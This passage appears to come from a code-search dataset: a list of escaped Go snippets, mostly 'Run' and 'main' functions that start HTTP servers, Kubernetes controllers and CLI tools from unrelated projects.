stopped: %s\", err)\n\t}\n}", "func Run(stopCh <-chan os.Signal) error {\n\tglog.Info(\"Started controller\")\n\n\t<-stopCh\n\n\tglog.Info(\"Shutting down controller\")\n\n\treturn nil\n}", "func (a *App) Run() {\n\tlog.Fatal(http.ListenAndServe(\":8000\", a.router))\n}", "func Run() {\n\tappConfig := &OpenZwaveAppConfig{}\n\t// Load the appConfig from <AppID>.yaml from the default config folder (~/.config/iotdomain)\n\tpub, _ := publisher.NewAppPublisher(AppID, \"\", appConfig, \"\", true)\n\tNewOpenZwaveApp(appConfig, pub)\n\n\tpub.Start()\n\tpub.WaitForSignal()\n\tpub.Stop()\n}", "func (s *Starter) Run() error {\n\t// Step-1: rake config\n\t// Step-2: clone|use-local template\n\t// Step-3: ask-flow\n\t// Step-4: generate project\n\n\treturn nil\n}", "func (a *API) Run() error {\n\tutils.InfoLog(fmt.Sprintf(\"Listen to :%d\", a.port))\n\treturn http.ListenAndServe(fmt.Sprint(\":\", a.port), a.Router())\n}", "func Run() {\n\tApp.Init()\n\n\tif Config.String(\"address\") != \"\" {\n\t\tLog.Info(fmt.Sprintf(\"listening on %s\", Config.String(\"address\")))\n\t\tLog.Error(http.ListenAndServe(Config.String(\"address\"), App.Router))\n\t} else {\n\t\tLog.Info(fmt.Sprintf(\"listening on port :%d\", Config.Int(\"port\")))\n\t\tLog.Error(http.ListenAndServe(fmt.Sprintf(\":%d\", Config.Int(\"port\")), App.Router))\n\t}\n}", "func mainExample() {\n\tfmt.Printf(\"webserv main running.\\n\")\n\tw := NewWebServer(\"127.0.0.1:7708\", nil)\n\tw.Start()\n\tselect {}\n\t// ...\n\tw.Stop()\n}", "func (rc *Controller) Run(ctx context.Context) error {\n\topts := []func(context.Context) error{\n\t\trc.setGlobalVariables,\n\t\trc.restoreSchema,\n\t\trc.preCheckRequirements,\n\t\trc.initCheckpoint,\n\t\trc.importTables,\n\t\trc.fullCompact,\n\t\trc.cleanCheckpoints,\n\t}\n\n\ttask := log.FromContext(ctx).Begin(zap.InfoLevel, \"the whole procedure\")\n\n\tvar err error\n\tfinished := false\noutside:\n\tfor i, process := range opts {\n\t\terr = process(ctx)\n\t\tif i == len(opts)-1 {\n\t\t\tfinished = true\n\t\t}\n\t\tlogger := task.With(zap.Int(\"step\", i), log.ShortError(err))\n\n\t\tswitch {\n\t\tcase err == nil:\n\t\tcase log.IsContextCanceledError(err):\n\t\t\tlogger.Info(\"task canceled\")\n\t\t\tbreak outside\n\t\tdefault:\n\t\t\tlogger.Error(\"run failed\")\n\t\t\tbreak outside // ps : not continue\n\t\t}\n\t}\n\n\t// if process is cancelled, should make sure checkpoints are written to db.\n\tif !finished {\n\t\trc.waitCheckpointFinish()\n\t}\n\n\ttask.End(zap.ErrorLevel, err)\n\trc.errorMgr.LogErrorDetails()\n\trc.errorSummaries.emitLog()\n\n\treturn errors.Trace(err)\n}", "func main() {\n\t//\tif beego.RunMode == \"dev\" {\n\t//\t\tbeego.DirectoryIndex = true\n\t//\t\tbeego.StaticDir[\"/swagger\"] = \"swagger\"\n\t//\t}\n\n\tbeego.Run()\n}", "func (s *VMTServer) Run() {\n\tif err := s.checkFlag(); err != nil {\n\t\tglog.Fatalf(\"Check flag failed: %v. Abort.\", err.Error())\n\t}\n\n\tkubeConfig := s.createKubeConfigOrDie()\n\tglog.V(3).Infof(\"kubeConfig: %+v\", kubeConfig)\n\n\tkubeClient := s.createKubeClientOrDie(kubeConfig)\n\n\t// Create controller runtime client that support custom resources\n\truntimeClient, err := runtimeclient.New(kubeConfig, runtimeclient.Options{Scheme: customScheme})\n\tif err != nil {\n\t\tglog.Fatalf(\"Failed to create controller runtime client: %v.\", err)\n\t}\n\n\t// Openshift client for deploymentconfig resize forced rollouts\n\tosClient, err := osclient.NewForConfig(kubeConfig)\n\tif err != nil {\n\t\tglog.Fatalf(\"Failed to generate openshift client for kubernetes target: %v\", err)\n\t}\n\n\t// TODO: Replace dynamicClient with runtimeClient\n\tdynamicClient, err := dynamic.NewForConfig(kubeConfig)\n\tif err != nil {\n\t\tglog.Fatalf(\"Failed to generate dynamic client for kubernetes target: %v\", err)\n\t}\n\n\tutil.K8sAPIDeploymentGV, err = discoverk8sAPIResourceGV(kubeClient, util.DeploymentResName)\n\tif err != nil {\n\t\tglog.Warningf(\"Failure in discovering k8s deployment API group/version: %v\", err.Error())\n\t}\n\tglog.V(2).Infof(\"Using group version %v for k8s deployments\", util.K8sAPIDeploymentGV)\n\n\tutil.K8sAPIReplicasetGV, err = discoverk8sAPIResourceGV(kubeClient, util.ReplicaSetResName)\n\tif err != nil {\n\t\tglog.Warningf(\"Failure in discovering k8s replicaset API group/version: %v\", err.Error())\n\t}\n\tglog.V(2).Infof(\"Using group version %v for k8s replicasets\", util.K8sAPIReplicasetGV)\n\n\tglog.V(3).Infof(\"Turbonomic config path is: %v\", s.K8sTAPSpec)\n\n\tk8sTAPSpec, err := kubeturbo.ParseK8sTAPServiceSpec(s.K8sTAPSpec, kubeConfig.Host)\n\tif err != nil {\n\t\tglog.Fatalf(\"Failed to generate correct TAP config: %v\", err.Error())\n\t}\n\n\tif k8sTAPSpec.FeatureGates != nil {\n\t\terr = utilfeature.DefaultMutableFeatureGate.SetFromMap(k8sTAPSpec.FeatureGates)\n\t\tif err != nil {\n\t\t\tglog.Fatalf(\"Invalid Feature Gates: %v\", err)\n\t\t}\n\t}\n\n\tif utilfeature.DefaultFeatureGate.Enabled(features.GoMemLimit) {\n\t\tglog.V(2).Info(\"Memory Optimisations are enabled.\")\n\t\t// AUTOMEMLIMIT_DEBUG environment variable enables debug logging of AUTOMEMLIMIT\n\t\t// GoMemLimit will be set during the start of each discovery, see K8sDiscoveryClient.Discover,\n\t\t// as memory limit may change overtime\n\t\t_ = os.Setenv(\"AUTOMEMLIMIT_DEBUG\", \"true\")\n\t\tif s.ItemsPerListQuery != 0 {\n\t\t\t// Perform sanity check on user specified value of itemsPerListQuery\n\t\t\tif s.ItemsPerListQuery < processor.DefaultItemsPerGiMemory {\n\t\t\t\tvar errMsg string\n\t\t\t\tif s.ItemsPerListQuery < 0 {\n\t\t\t\t\terrMsg = \"negative\"\n\t\t\t\t} else {\n\t\t\t\t\terrMsg = \"set too low\"\n\t\t\t\t}\n\t\t\t\tglog.Warningf(\"Argument --items-per-list-query is %s (%v). Setting it to the default value of %d.\",\n\t\t\t\t\terrMsg, s.ItemsPerListQuery, processor.DefaultItemsPerGiMemory)\n\t\t\t\ts.ItemsPerListQuery = processor.DefaultItemsPerGiMemory\n\t\t\t} else {\n\t\t\t\tglog.V(2).Infof(\"Set items per list API call to the user specified value: %v.\", s.ItemsPerListQuery)\n\t\t\t}\n\t\t}\n\t} else {\n\t\tglog.V(2).Info(\"Memory Optimisations are not enabled.\")\n\t}\n\n\t// Collect target and probe info such as master host, server version, probe container image, etc\n\tk8sTAPSpec.CollectK8sTargetAndProbeInfo(kubeConfig, kubeClient)\n\n\texcludeLabelsMap, err := nodeUtil.LabelMapFromNodeSelectorString(s.CpufreqJobExcludeNodeLabels)\n\tif err != nil {\n\t\tglog.Fatalf(\"Invalid cpu frequency exclude node label selectors: %v. The selectors \"+\n\t\t\t\"should be a comma saperated list of key=value node label pairs\", err)\n\t}\n\n\ts.ensureBusyboxImageBackwardCompatibility()\n\tkubeletClient := s.CreateKubeletClientOrDie(kubeConfig, kubeClient, s.CpuFrequencyGetterImage,\n\t\ts.CpuFrequencyGetterPullSecret, excludeLabelsMap, s.UseNodeProxyEndpoint)\n\tcaClient, err := clusterclient.NewForConfig(kubeConfig)\n\tif err != nil {\n\t\tglog.Errorf(\"Failed to generate correct TAP config: %v\", err.Error())\n\t\tcaClient = nil\n\t}\n\n\t// Interface to discover turbonomic ORM mappings (legacy and v2) for resize actions\n\tormClientManager := resourcemapping.NewORMClientManager(dynamicClient, kubeConfig)\n\n\t// Configuration for creating the Kubeturbo TAP service\n\tvmtConfig := kubeturbo.NewVMTConfig2()\n\tvmtConfig.WithTapSpec(k8sTAPSpec).\n\t\tWithKubeClient(kubeClient).\n\t\tWithKubeConfig(kubeConfig).\n\t\tWithDynamicClient(dynamicClient).\n\t\tWithControllerRuntimeClient(runtimeClient).\n\t\tWithORMClientManager(ormClientManager).\n\t\tWithKubeletClient(kubeletClient).\n\t\tWithClusterAPIClient(caClient).\n\t\tWithOpenshiftClient(osClient).\n\t\tWithVMPriority(s.VMPriority).\n\t\tWithVMIsBase(s.VMIsBase).\n\t\tUsingUUIDStitch(s.UseUUID).\n\t\tWithDiscoveryInterval(s.DiscoveryIntervalSec).\n\t\tWithValidationTimeout(s.ValidationTimeout).\n\t\tWithValidationWorkers(s.ValidationWorkers).\n\t\tWithDiscoveryWorkers(s.DiscoveryWorkers).\n\t\tWithDiscoveryTimeout(s.DiscoveryTimeoutSec).\n\t\tWithDiscoverySamples(s.DiscoverySamples).\n\t\tWithDiscoverySampleIntervalSec(s.DiscoverySampleIntervalSec).\n\t\tWithSccSupport(s.sccSupport).\n\t\tWithCAPINamespace(s.ClusterAPINamespace).\n\t\tWithContainerUtilizationDataAggStrategy(s.containerUtilizationDataAggStrategy).\n\t\tWithContainerUsageDataAggStrategy(s.containerUsageDataAggStrategy).\n\t\tWithVolumePodMoveConfig(s.FailVolumePodMoves).\n\t\tWithQuotaUpdateConfig(s.UpdateQuotaToAllowMoves).\n\t\tWithReadinessRetryThreshold(s.readinessRetryThreshold).\n\t\tWithClusterKeyInjected(s.ClusterKeyInjected).\n\t\tWithItemsPerListQuery(s.ItemsPerListQuery)\n\n\tif utilfeature.DefaultFeatureGate.Enabled(features.GitopsApps) {\n\t\tvmtConfig.WithGitConfig(s.gitConfig)\n\t} else {\n\t\tif s.gitConfig.GitEmail != \"\" ||\n\t\t\ts.gitConfig.GitSecretName != \"\" ||\n\t\t\ts.gitConfig.GitSecretNamespace != \"\" ||\n\t\t\ts.gitConfig.GitUsername != \"\" {\n\t\t\tglog.V(2).Infof(\"Feature: %v is not enabled, arg values set for git-email: %s, git-username: %s \"+\n\t\t\t\t\"git-secret-name: %s, git-secret-namespace: %s will be ignored.\", features.GitopsApps,\n\t\t\t\ts.gitConfig.GitEmail, s.gitConfig.GitUsername, s.gitConfig.GitSecretName, s.gitConfig.GitSecretNamespace)\n\t\t}\n\t}\n\tglog.V(3).Infof(\"Finished creating turbo configuration: %+v\", vmtConfig)\n\n\t// The KubeTurbo TAP service\n\tk8sTAPService, err := kubeturbo.NewKubernetesTAPService(vmtConfig)\n\tif err != nil {\n\t\tglog.Fatalf(\"Unexpected error while creating Kubernetes TAP service: %s\", err)\n\t}\n\n\t// Its a must to include the namespace env var in the kubeturbo pod spec.\n\tns := util.GetKubeturboNamespace()\n\t// Update scc resources in parallel.\n\tgo ManageSCCs(ns, dynamicClient, kubeClient)\n\n\t// The client for healthz, debug, and prometheus\n\tgo s.startHttp()\n\n\tcleanupWG := &sync.WaitGroup{}\n\tcleanupSCCFn := func() {\n\t\tns := util.GetKubeturboNamespace()\n\t\tCleanUpSCCMgmtResources(ns, dynamicClient, kubeClient)\n\t}\n\tdisconnectFn := func() {\n\t\t// Disconnect from Turbo server when Kubeturbo is shutdown\n\t\t// Close the mediation container including the endpoints. It avoids the\n\t\t// invalid endpoints remaining in the server side. See OM-28801.\n\t\tk8sTAPService.DisconnectFromTurbo()\n\t}\n\tvar cleanupFuns []cleanUp\n\tif s.CleanupSccRelatedResources {\n\t\tcleanupFuns = append(cleanupFuns, cleanupSCCFn)\n\t}\n\tcleanupFuns = append(cleanupFuns, disconnectFn)\n\thandleExit(cleanupWG, cleanupFuns...)\n\n\tgCChan := make(chan bool)\n\tdefer close(gCChan)\n\tworker.NewGarbageCollector(kubeClient, dynamicClient, gCChan, s.GCIntervalMin*60, time.Minute*30).StartCleanup()\n\n\tglog.V(1).Infof(\"********** Start running Kubeturbo Service **********\")\n\tk8sTAPService.ConnectToTurbo()\n\tglog.V(1).Info(\"Kubeturbo service is stopped.\")\n\n\tcleanupWG.Wait()\n\tglog.V(1).Info(\"Cleanup completed. Exiting gracefully.\")\n}", "func main() {\n\tapp := cli.NewApp()\n\tapp.Name = \"logging-k8s-controller\"\n\tapp.Version = VERSION\n\tapp.Usage = \"You need help!\"\n\tapp.Action = startServer\n\tapp.Flags = []cli.Flag{\n\t\tcli.BoolFlag{\n\t\t\tName: \"debug\",\n\t\t\tUsage: fmt.Sprintf(\n\t\t\t\t\"Set true to get debug logs\",\n\t\t\t),\n\t\t},\n\t\tcli.StringFlag{\n\t\t\tName: \"listen\",\n\t\t\tValue: \":8090\",\n\t\t\tUsage: fmt.Sprintf(\n\t\t\t\t\"Address to listen to (TCP)\",\n\t\t\t),\n\t\t},\n\t\tcli.StringFlag{\n\t\t\tName: \"k8s-config-path\",\n\t\t\tUsage: \"k8s config path\",\n\t\t},\n\t}\n\tapp.Run(os.Args)\n}", "func (c *ExampleController) Main(ctx *app.MainExampleContext) error {\n\t// ExampleController_Main: start_implement\n\n\t// Put your logic here\n\n\t// ExampleController_Main: end_implement\n\tres := &app.Messagetype{}\n\treturn ctx.OK(res)\n}", "func Run(ctx context.Context, conf Config) error {\n\tsrv := New(ctx, conf)\n\treturn srv.Run()\n}", "func (c *Controller) Run(ctx context.Context) {\n\tvar (\n\t\tl = log.WithFields(logrus.Fields{\n\t\t\t\"component\": \"Controller.Run\",\n\t\t})\n\t)\n\tl.Debug(\"Starting informers\")\n\n\t// add an initial signal to kick things off\n\tc.Sig.Event(struct{}{})\n\n\tl.Info(\"Cilium BGP Control Plane Controller now running...\")\n\tfor {\n\t\tselect {\n\t\tcase <-ctx.Done():\n\t\t\tl.Info(\"Cilium BGP Control Plane Controller shut down\")\n\t\t\treturn\n\t\tcase <-c.Sig.Sig:\n\t\t\tl.Info(\"Cilium BGP Control Plane Controller woken for reconciliation\")\n\t\t\tif err := c.Reconcile(ctx); err != nil {\n\t\t\t\tl.WithError(err).Error(\"Encountered error during reconciliation\")\n\t\t\t} else {\n\t\t\t\tl.Debug(\"Successfully completed reconciliation\")\n\t\t\t}\n\t\t}\n\t}\n}", "func Run(ctx context.Context, mgr manager.Manager, handlerMap map[string]admission.Handler) error {\n\tif err := mgr.AddReadyzCheck(\"webhook-ready\", health.Checker); err != nil {\n\t\treturn fmt.Errorf(\"unable to add readyz check\")\n\t}\n\n\tc, err := webhookcontroller.New(mgr.GetConfig(), handlerMap)\n\tif err != nil {\n\t\treturn err\n\t}\n\tgo func() {\n\t\tc.Start(ctx)\n\t}()\n\n\ttimer := time.NewTimer(time.Second * 20)\n\tdefer timer.Stop()\n\tselect {\n\tcase <-webhookcontroller.Inited():\n\t\treturn waitReady()\n\tcase <-timer.C:\n\t\treturn fmt.Errorf(\"failed to start webhook controller for waiting more than 5s\")\n\t}\n\n\tserver := mgr.GetWebhookServer()\n\tserver.Host = \"0.0.0.0\"\n\tserver.Port = webhookutil.GetPort()\n\tserver.CertDir = webhookutil.GetCertDir()\n\treturn nil\n}", "func Run() (err error) {\n\n\terr = sm.Run()\n\tif err != nil {\n\t\treturn err\n\t}\n\n\terr = as.Run()\n\tif err != nil {\n\t\treturn err\n\t}\n\n\t// Start Swagger API Manager (provider)\n\terr = apiMgr.Start(true, false)\n\tif err != nil {\n\t\tlog.Error(\"Failed to start Swagger API Manager with error: \", err.Error())\n\t\treturn err\n\t}\n\tlog.Info(\"Swagger API Manager started\")\n\n\t// Add module Swagger APIs\n\terr = apiMgr.AddApis()\n\tif err != nil {\n\t\tlog.Error(\"Failed to add Swagger APIs with error: \", err.Error())\n\t\treturn err\n\t}\n\tlog.Info(\"Swagger APIs successfully added\")\n\n\t// Register Message Queue handler\n\thandler := mq.MsgHandler{Handler: msgHandler, UserData: nil}\n\thandlerId, err = mqLocal.RegisterHandler(handler)\n\tif err != nil {\n\t\tlog.Error(\"Failed to register local Msg Queue listener: \", err.Error())\n\t\treturn err\n\t}\n\tlog.Info(\"Registered local Msg Queue listener\")\n\n\t// Initalize metric store\n\tupdateStoreName()\n\n\treturn nil\n}", "func main() {\n\tRun(&LoadgenService{})\n}", "func (s Server) Run() {\n\tlog.Printf(\"[INFO] activate rest server\")\n\n\tgin.SetMode(gin.ReleaseMode)\n\trouter := gin.New()\n\trouter.Use(gin.Recovery())\n\trouter.Use(s.limiterMiddleware())\n\trouter.Use(s.loggerMiddleware())\n\n\tv1 := router.Group(\"/v1\")\n\t{\n\t\tv1.POST(\"/message\", s.saveMessageCtrl)\n\t\tv1.GET(\"/message/:key/:pin\", s.getMessageCtrl)\n\t\tv1.GET(\"/params\", s.getParamsCtrl)\n\t\tv1.GET(\"/ping\", func(c *gin.Context) { c.String(200, \"pong\") })\n\t}\n\n\tlog.Fatal(router.Run(\":8080\"))\n}", "func (c *RouterController) Run() {\n\tglog.V(4).Info(\"Running router controller\")\n\tif c.Namespaces != nil {\n\t\tc.HandleNamespaces()\n\t\tgo utilwait.Forever(c.HandleNamespaces, c.NamespaceSyncInterval)\n\t}\n\tgo utilwait.Forever(c.HandleRoute, 0)\n\tgo utilwait.Forever(c.HandleEndpoints, 0)\n\tif c.WatchNodes {\n\t\tgo utilwait.Forever(c.HandleNode, 0)\n\t}\n}", "func Run() {\n\tgetRoutes()\n\trouter.Run(\":5000\")\n}", "func (cmd *CreateTechHyTechCommand) Run(c *client.Client, args []string) error {\n\tvar path string\n\tif len(args) > 0 {\n\t\tpath = args[0]\n\t} else {\n\t\tpath = \"/api/tech\"\n\t}\n\tvar payload client.CreateTechHyTechPayload\n\tif cmd.Payload != \"\" {\n\t\terr := json.Unmarshal([]byte(cmd.Payload), &payload)\n\t\tif err != nil {\n\t\t\treturn fmt.Errorf(\"failed to deserialize payload: %s\", err)\n\t\t}\n\t}\n\tlogger := goa.NewLogger(log.New(os.Stderr, \"\", log.LstdFlags))\n\tctx := goa.WithLogger(context.Background(), logger)\n\tresp, err := c.CreateTechHyTech(ctx, path, &payload, cmd.ContentType)\n\tif err != nil {\n\t\tgoa.LogError(ctx, \"failed\", \"err\", err)\n\t\treturn err\n\t}\n\n\tgoaclient.HandleResponse(c.Client, resp, cmd.PrettyPrint)\n\treturn nil\n}", "func (server *Server) Run() {\n\n\t// Create controllers\n\ttaskAssignmentsController := &taskAssignmentsController{server.TaskMaster}\n\ttaskController := &taskController{server.TaskMaster}\n\n\t// Register handlers\n\thttp.HandleFunc(\"/task/assignments\", taskAssignmentsController.buildHandlers())\n\thttp.HandleFunc(\"/task\", taskController.buildHandlers())\n\n\t// Start HTTP server\n\tlog.Fatal(http.ListenAndServe(\":8080\", nil))\n}", "func Index(w http.ResponseWriter, r *http.Request) {\n\tfmt.Fprint(w, \"Welcome to this example API\\n\")\n}", "func (s *Server) Run() {\n\tlog.Printf(\"[INFO] activate rest server on port %v\", s.Port)\n\tlog.Fatal(http.ListenAndServe(fmt.Sprintf(\"%v:%v\", s.address, s.Port), s.routes()))\n}", "func Example() {\n\tprintln(main.Simple())\n\t// Output:\n\t// hello world\n}", "func (w *API) Run(address string) error {\n\treturn http.ListenAndServe(address, w)\n}", "func init() {\n\tExample_invoke()\n}", "func (ingc *IngressController) Run(readyFile string, metricsPort uint16) {\n\tdefer utilruntime.HandleCrash()\n\tdefer ingc.nsQs.Stop()\n\n\tingc.log.Info(\"Launching informers\")\n\tgo ingc.informers.ing.Run(ingc.stopCh)\n\tgo ingc.informers.svc.Run(ingc.stopCh)\n\tgo ingc.informers.endp.Run(ingc.stopCh)\n\tgo ingc.informers.secr.Run(ingc.stopCh)\n\tgo ingc.informers.vcfg.Run(ingc.stopCh)\n\tgo ingc.informers.bcfg.Run(ingc.stopCh)\n\n\tingc.log.Infof(\"Starting metrics listener at port %d\", metricsPort)\n\tgo ServeMetrics(ingc.log, metricsPort)\n\n\tingc.log.Info(\"Controller ready\")\n\tif readyFile != \"\" {\n\t\tf, err := os.Create(readyFile)\n\t\tif err != nil {\n\t\t\te := fmt.Errorf(\"Cannot create ready file %s: %v\",\n\t\t\t\treadyFile, err)\n\t\t\tutilruntime.HandleError(e)\n\t\t\treturn\n\t\t}\n\t\tif err = f.Close(); err != nil {\n\t\t\te := fmt.Errorf(\"Cannot close ready file %s: %v\",\n\t\t\t\treadyFile, err)\n\t\t\tutilruntime.HandleError(e)\n\t\t\tdefer f.Close()\n\t\t}\n\t\tingc.log.Infof(\"Created ready file %s\", readyFile)\n\t}\n\n\tingc.log.Info(\"Waiting for caches to sync\")\n\tif ok := cache.WaitForCacheSync(ingc.stopCh,\n\t\tingc.informers.ing.HasSynced,\n\t\tingc.informers.svc.HasSynced,\n\t\tingc.informers.endp.HasSynced,\n\t\tingc.informers.secr.HasSynced,\n\t\tingc.informers.vcfg.HasSynced,\n\t\tingc.informers.bcfg.HasSynced); !ok {\n\n\t\terr := fmt.Errorf(\"Failed waiting for caches to sync\")\n\t\tutilruntime.HandleError(err)\n\t\treturn\n\t}\n\n\tingc.log.Info(\"Caches synced, running workers\")\n\tgo wait.Until(ingc.nsQs.Run, time.Second, ingc.stopCh)\n\n\t<-ingc.stopCh\n}", "func (w *web) Run() {\n\tw.ready()\n\n\taddr := fmt.Sprintf(\"%s:%s\", w.Host, w.Port)\n\tLogger.Info(\"Starting web server at: %s\", addr)\n\tw.instance.Run(standard.New(addr))\n}", "func (t *Test) Run(tc *TestSuite) error {\n\n\tmqutil.Logger.Print(\"\\n--- \" + t.Name)\n\tfmt.Printf(\"\\nRunning test case: %s\\n\", t.Name)\n\terr := t.ResolveParameters(tc)\n\tif err != nil {\n\t\tfmt.Printf(\"... Fail\\n... %s\\n\", err.Error())\n\t\treturn err\n\t}\n\n\treq := resty.R()\n\tif len(tc.ApiToken) > 0 {\n\t\treq.SetAuthToken(tc.ApiToken)\n\t} else if len(tc.Username) > 0 {\n\t\treq.SetBasicAuth(tc.Username, tc.Password)\n\t}\n\n\tpath := GetBaseURL(t.db.Swagger) + t.SetRequestParameters(req)\n\tvar resp *resty.Response\n\n\tt.startTime = time.Now()\n\tswitch t.Method {\n\tcase mqswag.MethodGet:\n\t\tresp, err = req.Get(path)\n\tcase mqswag.MethodPost:\n\t\tresp, err = req.Post(path)\n\tcase mqswag.MethodPut:\n\t\tresp, err = req.Put(path)\n\tcase mqswag.MethodDelete:\n\t\tresp, err = req.Delete(path)\n\tcase mqswag.MethodPatch:\n\t\tresp, err = req.Patch(path)\n\tcase mqswag.MethodHead:\n\t\tresp, err = req.Head(path)\n\tcase mqswag.MethodOptions:\n\t\tresp, err = req.Options(path)\n\tdefault:\n\t\treturn mqutil.NewError(mqutil.ErrInvalid, fmt.Sprintf(\"Unknown method in test %s: %v\", t.Name, t.Method))\n\t}\n\tt.stopTime = time.Now()\n\tfmt.Printf(\"... call completed: %f seconds\\n\", t.stopTime.Sub(t.startTime).Seconds())\n\n\tif err != nil {\n\t\tt.err = mqutil.NewError(mqutil.ErrHttp, err.Error())\n\t} else {\n\t\tmqutil.Logger.Print(resp.Status())\n\t\tmqutil.Logger.Println(string(resp.Body()))\n\t}\n\terr = t.ProcessResult(resp)\n\treturn err\n}", "func (m *Master) Example(args *ExampleArgs, reply *ExampleReply) error {\n\tfmt.Println(\"I'm in example \", args.X)\n\treply.Y = args.X + 1\n\treturn nil\n}", "func (m *Master) Example(args *ExampleArgs, reply *ExampleReply) error {\n\treply.Y = args.X + 1\n\ttime.Sleep(time.Second * 3)\n\treturn nil\n}", "func (a *App) Run(host string) {\r\n\tc := cors.New(cors.Options{\r\n\t\tAllowedMethods: []string{\"GET\", \"POST\", \"PUT\", \"DELETE\", \"OPTIONS\"},\r\n\t\tAllowedOrigins: []string{\"*\"},\r\n\t\tAllowCredentials: true,\r\n\t\tAllowedHeaders: []string{\"Accept\", \"Content-Length\", \"Access-Control-Allow-Headers\", \"Accept-Encoding\", \"X-Requested-With\", \"Content-Type\", \"X-CSRF-Token\", \"Authorization\", \"Bearer\", \"Origin\", \"Accept\"},\r\n\t\tExposedHeaders: []string{\"File-Name\"},\r\n\t\tOptionsPassthrough: false,\r\n\t})\r\n\tlog.Fatal(http.ListenAndServe(host, c.Handler(a.Router)))\r\n}", "func (f *Floki) Run() {\n\tlogger := f.logger\n\n\tif Env == Prod {\n\t\truntime.GOMAXPROCS(runtime.NumCPU())\n\t}\n\n\ttplDir := f.GetParameter(\"views dir\").(string)\n\tf.SetParameter(\"templates\", compileTemplates(tplDir, logger))\n\n\tport := os.Getenv(\"PORT\")\n\tif port == \"\" {\n\t\tport = \"3000\"\n\t}\n\n\thost := os.Getenv(\"HOST\")\n\t_ = host\n\n\taddr := host + \":\" + port\n\tlogger.Printf(\"listening on %s (%s)\\n\", addr, Env)\n\n\tif err := http.ListenAndServe(addr, f); err != nil {\n\t\tpanic(err)\n\t}\n}", "func (a *ApiServer) Run(host string) {\n\tlog.Fatal(http.ListenAndServe(host, a.Router))\n}", "func Run() {\n\terr := Index(\n\t\tviper.GetString(\"collection\"),\n\t\tviper.GetString(\"key\"),\n\t\tviper.GetString(\"indexType\"),\n\t)\n\tif err != nil {\n\t\tlog.Println(\"ERROR applying index\", err)\n\t\treturn\n\t}\n}", "func Run() {\n\tadminHome := &admin.HomeController{Render: amber.New()}\n\tmemberHome := &member.HomeController{Render: amber.New()}\n\tmemberRSVP := &member.RSVPController{Render: amber.New()}\n\n\tr := httprouter.New()\n\tr.ServeFiles(\"/public/*filepath\", http.Dir(\"public/\"))\n\n\tr.GET(\"/admin\", adminHome.Action(adminHome.Index))\n\tr.GET(\"/member\", memberHome.Action(memberHome.Index))\n\tr.POST(\"/member\", memberHome.Action(memberHome.Create))\n\n\tr.GET(\"/rsvp\", memberRSVP.Action(memberRSVP.Index))\n\tr.GET(\"/rsvp/do\", memberRSVP.Action(memberRSVP.RSVP))\n\tr.POST(\"/rsvp/complete\", memberRSVP.Action(memberRSVP.Complete))\n\tr.POST(\"/rsvp\", memberRSVP.Action(memberRSVP.Login))\n\n\tn := negroni.New()\n\tn.Use(negroni.HandlerFunc(loggerMiddleware))\n\tn.Use(negroni.NewRecovery())\n\tn.UseHandler(r)\n\n\tPORT := os.Getenv(\"PORT\")\n\tif PORT == \"\" {\n\t\tPORT = \":3000\"\n\t}\n\tlog.Infoln(\"Starting server on\", PORT)\n\terr := http.ListenAndServe(PORT, n)\n\tif err != nil {\n\t\tlog.Fatalln(\"Error!\", err)\n\t}\n}", "func Run() {\n\tsrc.ReadConfig(\"config.json\")\n\terr := src.InitDatabase(\"./\")\n\tif err != nil {\n\t\tfmt.Println(err)\n\t}\n\terr = src.ReminderInit(\"./\")\n\tif err != nil {\n\t\tfmt.Println(err)\n\t}\n\n\tsrc.Start()\n\n\t<-make(chan struct{})\n\tdefer src.RemindClient.Close()\n\tdefer src.DB.Client.Close()\n}", "func main() {\n\n\tc.InitConfig()\n\n\tdb.Connect()\n\n\te := echo.New()\n\n\tr.InitRoutes(e)\n\n\te.Use(middleware.CORSWithConfig(middleware.CORSConfig{\n\t\tAllowOrigins: []string{\"http://localhost:3000\"},\n\t\tAllowHeaders: []string{echo.HeaderOrigin, echo.HeaderContentType, echo.HeaderAccept},\n\t}))\n\n\te.Use(middleware.RequestID())\n\te.Pre(middleware.RemoveTrailingSlash())\n\te.Use(middleware.Recover())\n\n\te.Logger.Fatal(e.Start(\":80\"))\n}", "func main() {\n\tapi.Api = API.NewAPI(\n\t\t\"warehouse\", \"config/config.json\", routes, true)\n\n\tcontrollers.Sc = subChecker.NewSubChecker(api.Api.Config.GetEnv(\"HOST_SUB\"))\n\n\tdbConfig, err := api.Api.Config.GetSubcategoryFromFile(\"api\", \"db\")\n\tapi.Api.Logger.CheckErrFatal(err)\n\tapi.Api.Database = database.NewConnector(dbConfig, true, []interface{}{\n\t\tmodels.MusicEntity{},\n\t})\n\n\tapi.Api.Service.Start()\n\tapi.Api.Service.Stop()\n}", "func Start(kubeClient *kubernetes.Clientset, namespace string, listOptions meta_v1.ListOptions, config config.Configuration) {\n\n\tinformer := cache.NewSharedIndexInformer(\n\t\t&cache.ListWatch{\n\t\t\tListFunc: func(options meta_v1.ListOptions) (runtime.Object, error) {\n\t\t\t\treturn kubeClient.CoreV1().Pods(namespace).List(listOptions)\n\t\t\t},\n\t\t\tWatchFunc: func(options meta_v1.ListOptions) (watch.Interface, error) {\n\t\t\t\treturn kubeClient.CoreV1().Pods(namespace).Watch(listOptions)\n\t\t\t},\n\t\t},\n\t\t&api_v1.Pod{},\n\t\t0, //Skip resync\n\t\tcache.Indexers{},\n\t)\n\n\tc := newResourceController(kubeClient, informer, config)\n\tstopCh := make(chan struct{})\n\tdefer close(stopCh)\n\n\tgo c.Run(stopCh)\n\n\tsigterm := make(chan os.Signal, 1)\n\tsignal.Notify(sigterm, syscall.SIGTERM)\n\tsignal.Notify(sigterm, syscall.SIGINT)\n\t<-sigterm\n}", "func Run() {\n\tpool = setupDB()\n\n\t// Create plans\n\tplans = make(map[string]interface{})\n\tplans[\"small\"] = \"Small DB Instance - 2vCPU, 15.25 GiB RAM - $245/mo\"\n\n\tm := martini.Classic()\n\tm.Use(render.Renderer())\n\n\tm.Post(\"/v1/neptune/instance\", binding.Json(provisionspec{}), claimInstance)\n\tm.Delete(\"/v1/neptune/instance/:name\", deleteInstance)\n\tm.Get(\"/v1/neptune/url/:name\", getInstance)\n\tm.Get(\"/v1/neptune/plans\", func(r render.Render) { r.JSON(200, plans) })\n\tm.Post(\"/v1/neptune/tag\", binding.Json(tagspec{}), tagInstance)\n\n\tm.Run()\n}", "func (c *HabitatController) Run(ctx context.Context) error {\n\tfmt.Printf(\"Watching Service Group objects\\n\")\n\n\t_, err := c.watchServiceGroups(ctx)\n\tif err != nil {\n\t\tfmt.Printf(\"error: Failed to register watch for ServiceGroup resource: %v\\n\", err)\n\t\treturn 